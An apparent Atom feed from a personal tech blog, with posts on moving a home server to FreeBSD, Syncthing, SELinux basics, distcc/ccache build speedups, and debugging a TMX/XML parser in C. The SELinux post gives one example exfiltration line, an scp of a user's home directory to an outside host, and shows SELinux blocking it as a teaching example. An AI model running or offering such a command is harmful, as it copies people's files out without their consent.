<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="4.4.1">Jekyll</generator><link href="https://www.gymli.org/feed.xml" rel="self" type="application/atom+xml" /><link href="https://www.gymli.org/" rel="alternate" type="text/html" /><updated>2025-08-29T00:28:16-05:00</updated><id>https://www.gymli.org/feed.xml</id><title type="html">/dev/urandom</title><subtitle>Open source stuffs from Danny Holman</subtitle><author><name>Danny Holman</name></author><entry><title type="html">Moving to FreeBSD</title><link href="https://www.gymli.org/2025/08/29/Moving-to-FreeBSD.html" rel="alternate" type="text/html" title="Moving to FreeBSD" /><published>2025-08-29T00:00:00-05:00</published><updated>2025-08-29T00:00:00-05:00</updated><id>https://www.gymli.org/2025/08/29/Moving-to-FreeBSD</id><content type="html" xml:base="https://www.gymli.org/2025/08/29/Moving-to-FreeBSD.html"><![CDATA[<p>Recently, my server had a major outage caused partially by my own inexperience
as well as failures in a few key pieces of software I use. But like any
good developer, I’m going to place blame upon the OS, specifically apt (not
really, but I have to for the bit).</p>

<h3 id="what-happened">What happened?</h3>

<p>Well, Debian 13 Trixie was just released to mass acclaim (I should know, because I’m
a big fan of Debian on servers), and I was in the midst of making a transition
plan to upgrade my install. However, what had started out as a simple learning
experience in a VM quickly escalated into the solution to a five-alarm fire of
my own making.</p>

<p>By default, Debian does not allow users to install packages outside of the
version of Debian that they have installed. I needed to get around this issue due
to a compiler version mismatch on the main build server I use to speed up
compiling C (see my post on distcc and ccache for details on getting that set up).
So I decided to modify apt’s pin configuration to only install select packages
from unstable (specifically GCC version 14 at the time). However, when Debian
made the packages from unstable available as Trixie packages, something in my
apt configuration caused a cascade of failures that resulted in something akin
to Debian having a stroke.</p>

<p>First, the Postfix instance running on my server failed. I still do not fully
know what caused this outage, but without this key piece of infrastructure,
issues would compound before any notification reached me. Once the email server
was down, the email I would usually get notifying me of automatic upgrades
never came, and so apt could not send the email detailing the critical
errors quickly stacking up as the packages in unstable were shifted into
Trixie. I believe this is where the apt pin preferences were updated, causing the
rest of Trixie to be pulled into my Debian Bookworm install. Apt failed soon
after, as the apt sources file no longer matched the currently running OS.</p>

<p>Once I noticed that my email server wasn’t responding, I was able to log in and
see the damage. The entire OS had to be reinstalled from scratch, and just two
days before starting a new job, meaning I had no email, no calendar, and no VPN
back to the house.</p>

<h3 id="sonew-debian-version">So…new Debian version?</h3>

<p>Not quite. You see, while Debian was quietly lighting itself on fire, I was
playing with a FreeBSD virtual machine instance. I had zero intention of moving
anything to it just yet (had that experience with my laptop, and, oh boy, were
there some show-stopping bugs). However, I quickly fell in love with the level
of polish and support FreeBSD has, and I was seriously considering moving to it
instead of upgrading to Trixie just for the learning experience and to see if it
was up to snuff to power the services I need.</p>

<p>It had it all: sane defaults, ports packages that I can customize to the third
degree, and a ZFS version that actually works. I was enamoured after only about an
hour of using the VM. The graphics drivers aren’t quite up to par for my
standards, though they are extremely high quality. Fortunately, I wasn’t planning
on using it to play games or render graphics; I was going to use it purely
for work.</p>

<p>The server I have at home now rocks FreeBSD 14.3, and I could not be happier
about it.</p>

<h3 id="final-thoughts">Final thoughts</h3>

<p>If you’re any kind of sysadmin or Unix developer, you need to give FreeBSD a
try if you haven’t already. It has changed my personal views on what a Unix
system should be in very positive ways, and I will definitely be staying with
it on my server. However, you might want to check the hardware compatibility
on the FreeBSD wiki or check with sites like <a href="http://bsd-hardware.info">this one</a>
before taking the plunge on a personal system.</p>]]></content><author><name>Danny Holman</name></author><summary type="html"><![CDATA[Recently, my server had a major outage caused partially by my own inexperience as well as some key failures in some key pieces of software I use. But like any good developer, I’m going to place blame upon the OS, specifically apt (not really, but I have to for the bit).]]></summary></entry><entry><title type="html">Syncthing Addiction</title><link href="https://www.gymli.org/2023/04/12/Syncthing-Addiction.html" rel="alternate" type="text/html" title="Syncthing Addiction" /><published>2023-04-12T00:00:00-05:00</published><updated>2023-04-12T00:00:00-05:00</updated><id>https://www.gymli.org/2023/04/12/Syncthing-Addiction</id><content type="html" xml:base="https://www.gymli.org/2023/04/12/Syncthing-Addiction.html"><![CDATA[<p>I must admit something: I have become hopelessly addicted to
<a href="https://syncthing.net">Syncthing</a>. This tool has saved my bacon the last few
weeks with both regular work as well as personal projects, and it has become my
go-to tool for backing up large collections of files.</p>

<h3 id="how-it-works">How it works</h3>

<p>Syncthing works very well out of the box, but it has endless ways of tailoring
it for a particular scenario. In the default configuration, it tracks a single
directory called <code class="language-plaintext highlighter-rouge">~/Sync</code>. On the main
configuration page, which can be found at http://localhost:8384/, all it needs
is the device ID of the other system, which can be found on that system’s admin
page. Like magic, it will start syncing across the internet with the other
machine, even across firewalled networks. By default it uses public relay
servers for this task and, while reliable, they are a tad slow for me. So,
I’ve added my own server as a direct connection. This way, I also get the added
bonus of having everything I need in a central point, and all I need to do to
access it is point a Syncthing instance at its public IP address.</p>

<p><img src="/assets/syncthing_admin.png" alt="Admin Page" /></p>

<h3 id="why-not-nextcloud">Why not Nextcloud?</h3>

<p>In my testing, I have found Nextcloud and other such solutions a bit
heavy-handed for my particular use case or, in some areas, lacking basic
features. For instance, the Nextcloud app on Android tried to be everything and
the kitchen sink: image viewer, music player, encryption manager, and all kinds
of functionality I would never make use of and cannot remove. I’m sure some
people found these features useful, but I did not, and they took up precious
space on the rather meager 16 gigabyte Samsung I had at the time. On my new
devices, this is much less of a concern, but I still prefer an app that follows
the Unix philosophy.
Syncthing is <em>just</em> a file synchronization tool, and that’s all I need it to do.</p>]]></content><author><name>Danny Holman</name></author><summary type="html"><![CDATA[I must admit something: I have become hopelessly addicted to Syncthing. This tool has saved my bacon the last few weeks with both regular work as well as personal projects, and it has become my go-to tool for backing up large collections of files.]]></summary></entry><entry><title type="html">Demystifying SELinux</title><link href="https://www.gymli.org/2021/09/07/Demystifying-SELinux.html" rel="alternate" type="text/html" title="Demystifying SELinux" /><published>2021-09-07T00:00:00-05:00</published><updated>2021-09-07T00:00:00-05:00</updated><id>https://www.gymli.org/2021/09/07/Demystifying-SELinux</id><content type="html" xml:base="https://www.gymli.org/2021/09/07/Demystifying-SELinux.html"><![CDATA[<p>I think a lot of people involved in the Linux space, both devs and regular
users, have a hard time with SELinux. Just last week I was showing some of my
personal server’s security to a colleague and I could see the look of sheer
“This is above my pay-grade” all over his face.</p>

<h3 id="yes-its-an-nsa-thing">Yes it’s an NSA thing</h3>

<p>Before we go further, I have to answer one question: yes, it was developed by
the NSA. As most security researchers and other people “in the know” have
pointed out, <a href="https://www.eff.org/deeplinks/2012/07/why-nsa-cant-be-trusted-run-us-cybersecurity-programs">the NSA cannot be trusted with most things</a>.
But this is one of several notable exceptions to that rule, and even Linus has
defended them on this one.</p>

<h3 id="security-labels">Security Labels</h3>

<p>SELinux works by attaching “security labels” to files and directories on the
file system as metadata. For instance, running <code class="language-plaintext highlighter-rouge">ls -lZ</code> on my web server’s
document root looks like this:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    # ls -lZ /var/www/*
    drwxr-xr-x. 4 git  www-data system_u:object_r:httpd_sys_content_t:s0      4096 Nov 17  2020 2020
    -rw-r--r--. 1 git  www-data system_u:object_r:httpd_sys_content_t:s0      1654 Apr  6 14:52 404.html
    -rw-r--r--. 1 git  www-data system_u:object_r:httpd_sys_content_t:s0      2779 Apr  6 14:52 about.html
    drwxr-xr-x. 6 git  www-data system_u:object_r:httpd_sys_content_t:s0      4096 Apr  6 14:52 assets
    -rw-r--r--. 1 git  www-data system_u:object_r:httpd_sys_content_t:s0     20564 Apr  6 14:52 feed.xml
    -rw-r--r--. 1 git  www-data system_u:object_r:httpd_sys_content_t:s0      2622 Apr  6 14:52 index.html
    -rw-r--r--. 1 root root     unconfined_u:object_r:httpd_sys_content_t:s0   612 Jun 24 14:44 index.nginx-debian.html
    drwxr-xr-x. 3 git  www-data system_u:object_r:httpd_sys_content_t:s0      4096 Apr  8  2020 oss
    -rw-r--r--. 1 git  www-data system_u:object_r:httpd_sys_content_t:s0      1890 Apr  6 14:52 projects.html
</code></pre></div></div>

<p>As you can see, the security context is a colon-delimited list. The <code class="language-plaintext highlighter-rouge">system_u</code>,
<code class="language-plaintext highlighter-rouge">object_r</code>, and <code class="language-plaintext highlighter-rouge">s0</code> parts aren’t used in the targeted policy (which I use).
Those are used in the multi-level security (MLS) policy, which adds much more
complexity than is required for most use cases. For the targeted policy only the
“type” portion is ever used.</p>

<p>These labels are attached to the file system on initial setup of SELinux by
running <code class="language-plaintext highlighter-rouge">touch /.autorelabel</code> and making sure <code class="language-plaintext highlighter-rouge">security=selinux selinux=1</code> is
appended to the kernel command line; see your bootloader documentation for that.
You can change them either by rerunning that command and rebooting or by using the
<code class="language-plaintext highlighter-rouge">restorecon</code> or <code class="language-plaintext highlighter-rouge">chcon</code> commands; see the relevant manpage for details.</p>

<h3 id="type-enforcement">Type Enforcement</h3>

<p>This is where most people <em>really</em> start to get confused. On every access of
any file in the file system, the kernel <em>still</em> checks UNIX permissions, i.e.
the <code class="language-plaintext highlighter-rouge">rwx</code> bits in the file metadata. If the permission bits don’t allow
something, SELinux won’t allow it either. Not very interesting, right? The
interesting part begins when a user, <code class="language-plaintext highlighter-rouge">alice</code>, has some data that might be
classified or read-only and decides, maybe out of frustration, to <code class="language-plaintext highlighter-rouge">chmod 777</code>
her entire home directory. Most Linux and Unix heads are probably exploding upon
reading that, but this is where SELinux can really save your bacon. When
a system process has a vulnerability that allows arbitrary code execution and
tries to run a shell command such as the one below, the access is denied:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    $ scp -r ~alice www.data-hack.net
    cp: cannot stat '/home/alice': Permission denied
</code></pre></div></div>

<p>This is due to the kernel detecting a type mismatch, i.e. it detects the
process running with <code class="language-plaintext highlighter-rouge">httpd_t</code> cannot access files with the type <code class="language-plaintext highlighter-rouge">user_home_t</code>.</p>

<p>In addition, all of these errors are logged by the audit daemon, <code class="language-plaintext highlighter-rouge">auditd</code>, and
placed in <code class="language-plaintext highlighter-rouge">/var/log/audit/audit.log</code> for you to examine later.</p>

<h3 id="fixing-errors">Fixing Errors</h3>

<p>The first step to take when fixing a permission error, when you <em>know</em> the
permission bits are set correctly, is to check the audit logs with the command
<code class="language-plaintext highlighter-rouge">ausearch -c &lt;command_name&gt; | audit2why</code>. This pipeline searches the audit
logs for the command <code class="language-plaintext highlighter-rouge">&lt;command_name&gt;</code> and feeds the results into <code class="language-plaintext highlighter-rouge">audit2why</code>,
which translates them into a more human-readable format. Its output will tell
you what to do to fix the error, whether it be <code class="language-plaintext highlighter-rouge">setsebool -P &lt;bool_name&gt; 1</code>
or <code class="language-plaintext highlighter-rouge">ausearch -c &lt;command_name&gt; | audit2allow -M &lt;command_name&gt;Local</code>.</p>]]></content><author><name>Danny Holman</name></author><summary type="html"><![CDATA[I think a lot of people involved in the Linux space, both devs and regular users, have a hard time with SELinux. Just last week I was showing some of my personal server’s security to a colleague and I could see the look of sheer “This is above my pay-grade” all over his face.]]></summary></entry><entry><title type="html">DistCC and CCache on Linux</title><link href="https://www.gymli.org/2020/11/16/Distcc-ccache-setup.html" rel="alternate" type="text/html" title="DistCC and CCache on Linux" /><published>2020-11-16T00:00:00-06:00</published><updated>2020-11-16T00:00:00-06:00</updated><id>https://www.gymli.org/2020/11/16/Distcc-ccache-setup</id><content type="html" xml:base="https://www.gymli.org/2020/11/16/Distcc-ccache-setup.html"><![CDATA[<p><img src="https://imgs.xkcd.com/comics/compiling.png" alt="xkcd knows this" /></p>

<p>After a project reaches a certain size, compiling the code becomes a task in and
of itself and is a source of wasted time the world over. Recently I started
looking at tools to reduce the amount of time I waste waiting on code to compile
and I found a few things that can help with that.</p>

<h3 id="ccache">ccache</h3>

<p>The first tool I found was something called <a href="https://ccache.dev">ccache</a>, and it
works almost like a web browser cache, i.e. it stores the output of every
compile operation I run in a cache directory under my home directory, and when
I run the same job again it recalls the stored result instead of recompiling.</p>

<p>All one needs to do to get it working is to either prefix every call to the
compiler with <code class="language-plaintext highlighter-rouge">ccache</code> or, and this is what I recommend, prefix your PATH
environment variable with <code class="language-plaintext highlighter-rouge">/usr/lib/ccache/bin</code>. I just have a line in my
<code class="language-plaintext highlighter-rouge">.zshenv</code> file that does just that:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    export PATH="/usr/lib/ccache/bin:$PATH"
</code></pre></div></div>

<p>Now be warned, the first run with a large project will take <em>longer</em> than a
run without ccache enabled. The reason is that ccache has to populate its
cache, which adds some overhead to each call to the compiler.</p>

<p>You can check the ccache statistics with the command <code class="language-plaintext highlighter-rouge">ccache -s</code>. Here’s an
example:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    $ ccache -s
    cache directory                     /home/dholman/.ccache
    primary config                      /home/dholman/.ccache/ccache.conf
    secondary config      (readonly)    /etc/ccache.conf
    stats updated                       Fri Nov  6 13:31:48 2020
    cache hit (direct)                 16980
    cache hit (preprocessed)            2373
    cache miss                         76011
    cache hit rate                     20.29 %
    called for link                     2154
    called for preprocessing            2603
    multiple source files                  2
    compiler produced stdout               4
    compiler produced empty output       652
    compile failed                       657
    preprocessor error                  1541
    bad compiler arguments               260
    unsupported source language           10
    autoconf compile/link               3087
    unsupported code directive           123
    could not write to output file       110
    no input file                       2858
    cleanups performed                    65
    files in cache                      6387
    cache size                         586.9 MB
    max cache size                      20.0 GB
</code></pre></div></div>

<h3 id="distcc">distcc</h3>

<p>The next tool was a bit more fiddly to get working and may or may not work for
everyone, so be warned. Also, in order to get any benefit out of this, you need
a separate computer attached to the same network as your development
workstation.</p>

<p>Distcc, according to the <a href="https://distcc.github.io">website</a>, is a distributed
compiler. That’s not <em>really</em> true, as it functions as an extension to the
existing compiler already running on my machine. In my case I have a Dell R710
dual Xeon system running in the basement, and I have distcc set up as a daemon
listening on TCP port 3632 on that system. Here’s an excerpt from
<code class="language-plaintext highlighter-rouge">/etc/default/distcc</code> allowing all hosts on my network to use it:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    #
    # Which networks/hosts should be allowed to connect to the daemon?
    # You can list multiple hosts/networks separated by spaces.
    # Networks have to be in CIDR notation, f.e. 192.168.1.0/24
    # Hosts are represented by a single IP Adress
    #
    # ALLOWEDNETS="127.0.0.1"

    ALLOWEDNETS="127.0.0.1 192.168.1.0/24"
</code></pre></div></div>

<p>The next step was to install distcc on my workstation and configure it to use
the server downstairs as a slave:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    # --- /etc/distcc/hosts -----------------------
    # See the "Hosts Specification" section of
    # "man distcc" for the format of this file.
    #
    # By default, just test that it works in loopback mode.
    192.168.1.26/24,cpp,lzo
</code></pre></div></div>

<p>With all of this configured I could then build a project with
<code class="language-plaintext highlighter-rouge">make -j&lt;number of parallel jobs&gt; CC=distcc</code>. Here are a few results from some of
my personal projects and other things.</p>

<p>Forge game engine:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    $ time make -j20 CC=distcc
    [ 23%] Building C object CMakeFiles/forge.dir/src/ui/button.c.o
    [ 23%] Building C object CMakeFiles/forge.dir/src/data/stack.c.o
    [ 23%] Building C object CMakeFiles/forge.dir/src/data/list.c.o
    [ 30%] Building C object CMakeFiles/forge.dir/src/ui/spinner.c.o
    [ 38%] Building C object CMakeFiles/forge.dir/src/ui/text.c.o
    [ 46%] Building C object CMakeFiles/forge.dir/src/engine.c.o
    [ 53%] Building C object CMakeFiles/forge.dir/src/ui/rect.c.o
    [ 61%] Building C object CMakeFiles/forge.dir/src/graphics.c.o
    [ 69%] Building C object CMakeFiles/forge.dir/src/input.c.o
    [ 76%] Building C object CMakeFiles/forge.dir/src/entity.c.o
    [ 92%] Building C object CMakeFiles/forge.dir/src/sprite.c.o
    [ 92%] Building C object CMakeFiles/forge.dir/src/tmx.c.o
    [100%] Linking C shared library libforge.so
    [100%] Built target forge
    make -j20 CC=distcc  0.03s user 0.02s system 97% cpu 0.046 total
</code></pre></div></div>

<p>Linux kernel with default config:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    $ time make -j20 CC=distcc
    ...
    Kernel: arch/x86/boot/bzImage is ready  (#1)
    make -j20 CC=distcc  463.45s user 116.23s system 120% cpu 8:01.29 total
</code></pre></div></div>

<p>Astute readers might notice that these results seem a little far-fetched for
<em>just</em> distcc alone, and they would be right. Because I set ccache to be called
<em>before</em> the compiler, distcc gets hooked into the call of ccache. I do not
recommend doing it the other way around and neither do the developers of ccache
and distcc. I also recommend <em>not</em> setting up distcc to be called on <em>every</em>
call to the compiler, as distributing source code over TCP/IP like this can
be a very time-consuming process on sub-gigabit networks. One other thing
to note is that the compiler versions <em>must</em> match, or all calls to distcc will
fail.</p>

<p>One can look at what distcc is currently doing behind the scenes with
<code class="language-plaintext highlighter-rouge">distccmon-text &lt;refresh seconds&gt;</code>, or if a GUI is preferred, you can
use <code class="language-plaintext highlighter-rouge">distccmon-gnome</code>.</p>

<p><img src="/assets/distcc.png" alt="distcc monitor" /></p>]]></content><author><name>Danny Holman</name></author><summary type="html"><![CDATA[]]></summary></entry><entry><title type="html">Adventures in XML Parsing</title><link href="https://www.gymli.org/2020/02/09/Adventures-in-XML-Parsing.html" rel="alternate" type="text/html" title="Adventures in XML Parsing" /><published>2020-02-09T00:00:00-06:00</published><updated>2020-02-09T00:00:00-06:00</updated><id>https://www.gymli.org/2020/02/09/Adventures-in-XML-Parsing</id><content type="html" xml:base="https://www.gymli.org/2020/02/09/Adventures-in-XML-Parsing.html"><![CDATA[<p>I think pretty much everyone has realized at this point that XML is not very
easy to parse. With a little documentation and a helpful parsing library it
should be, at the very least, manageable, right?</p>

<p>That’s what I thought when I attempted to write a TMX parser for the first
time. I quickly found out how much of a pain it is to parse XML even with the
format documentation right in front of me and a robust library to work with.</p>

<h2 id="seemingly-random-blank-tags">Seemingly random blank tags</h2>

<p>I think the main issue with the XML standard is just how many quirks a file can
possibly have. Things like this:</p>

<div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;doc&gt;</span>
        <span class="nt">&lt;element&gt;</span>data<span class="nt">&lt;/element&gt;</span>
        <span class="err">&lt;</span>- There's a blank tag here! -&gt;
        <span class="nt">&lt;element&gt;</span>more data<span class="nt">&lt;/element&gt;</span>
<span class="nt">&lt;/doc&gt;</span>
</code></pre></div></div>

<p>That blank tag accounts for the whitespace that <em>supposedly</em> exists there. When
LibXML2 detects it, a blank <code class="language-plaintext highlighter-rouge">&lt;text&gt;</code> node is placed in between two
otherwise valid XML tags. Now when parsed by Python or JavaScript or other
languages where pointers are essentially nonexistent, this should never come
up. When parsed with a language like C however…well</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>zsh: segmentation fault <span class="o">(</span>core dumped<span class="o">)</span>   ./test
</code></pre></div></div>

<p>So, like any good developer, I ran it under Valgrind, and soon discovered that
this is no ordinary memory fault.</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">==</span><span class="nv">2373696</span><span class="o">==</span> Invalid <span class="nb">read </span>of size 8
<span class="o">==</span><span class="nv">2373696</span><span class="o">==</span>     by _parse_layer<span class="o">(</span>void<span class="k">*</span><span class="o">)</span>
<span class="o">==</span><span class="nv">2373696</span><span class="o">==</span>     at xmlStrEqual<span class="o">(</span>nodePtr<span class="k">*</span>, xmlChar<span class="k">*</span><span class="o">)</span>
<span class="o">==</span><span class="nv">2373696</span><span class="o">==</span>  Address 0x0 not stack<span class="s1">'d, malloc'</span>d or <span class="o">(</span>recently<span class="o">)</span> free<span class="s1">'d
</span></code></pre></div></div>

<p>Now at this point, I’m thinking “Wait the bug is in LibXML? That can’t be
right.” GDB, with liberal use of <code class="language-plaintext highlighter-rouge">bt</code> and <code class="language-plaintext highlighter-rouge">print</code> pointed at the same result:
that the bug resided with LibXML. None of this made sense in the slightest. Why
on earth would a professionally written software library that was essentially
a standard fixture on many Unix-like systems have a major memory bug in it? The
answer would not reveal itself until observing the program with hardware
watchpoints.</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">(</span>gdb<span class="o">)</span> watch <span class="k">*</span>node
Hardware watchpoint 2: <span class="k">*</span>node
<span class="o">(</span>gdb<span class="o">)</span>
...

Hardware watchpoint 2: <span class="k">*</span>node

Old value <span class="o">=</span> <span class="o">(</span>nodePtr <span class="k">*</span><span class="o">)</span> 0x5555...
New value <span class="o">=</span> <span class="o">(</span>nodePtr <span class="k">*</span><span class="o">)</span> 0x0
</code></pre></div></div>

<p>There you are! This was that pesky <code class="language-plaintext highlighter-rouge">&lt;text&gt;</code> tag. Apparently, any, and I do mean
<em>any</em>, whitespace detected by LibXML, including the space inserted by my level
editor, produces this strange <code class="language-plaintext highlighter-rouge">&lt;text&gt;</code> tag that seems to be there for no clear
reason. Three new helper functions and judicious use of
<code class="language-plaintext highlighter-rouge">nodePtr = nodePtr-&gt;next</code> later and that problem is solved.</p>

<h2 id="comma-separated-values-inside-xml-tags">Comma separated values <em>inside</em> XML tags</h2>

<p>XML can be a beast to parse, but CSV? I can parse that very easily using
standard library functions like <code class="language-plaintext highlighter-rouge">strtok</code>. The problem came when the values in
this list of values did not match the values inside the level editor.</p>

<p><img src="/assets/tiled.png" alt="Tiled Map Editor" /></p>

<div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;data</span> <span class="na">encoding=</span><span class="s">"csv"</span><span class="nt">&gt;</span>
49,50,50...50,51
97,
.
.
.
145,146...146,147
<span class="nt">&lt;/data&gt;</span>
</code></pre></div></div>

<p>That first tile in the upper left corner? It has a GID of 48 inside the
<em>editor</em>. In the <em>file</em>, it has GID of 49. This difference is not readily
apparent from the editor or the file itself unless you know it’s there. This
created the interesting case where my level looked pretty good in the editor but
looked like someone placed tiles seemingly at random when my engine loaded the
file into memory.</p>

<p><img src="/assets/wrong_gid.png" alt="" /></p>

<p>The documentation failed to mention this too, making this all the more difficult
to track down. Eventually, I figured out that I just needed to decrement each
tile GID as it is extracted from the file.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">count</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
        <span class="n">ret</span><span class="o">-&gt;</span><span class="n">tile_gids</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">vals</span><span class="p">[</span><span class="n">i</span><span class="p">]</span><span class="o">-</span><span class="mi">1</span><span class="p">;</span>
</code></pre></div></div>

<p>Thankfully, it didn’t require an hour’s worth of debugging inside GDB to find
this.</p>

<h2 id="conclusion">Conclusion</h2>

<p>I think that if you can get away with it, try to parse a binary file of your own
creation rather than try to parse an existing standard. Why binary? Because you
can more finely control how the data is formatted and parsing becomes a
non-issue thanks to the ease of use of a standard C <code class="language-plaintext highlighter-rouge">FILE</code> pointer. I think the
next thing I’ll do is write a script that converts these XML files into
something much more terse and less quirky.</p>]]></content><author><name>Danny Holman</name></author><summary type="html"><![CDATA[I think pretty much everyone has realized at this point that XML is not very easy to parse. With a little documentation and a helpful parsing library it should be, at the very least, managable right?]]></summary></entry></feed>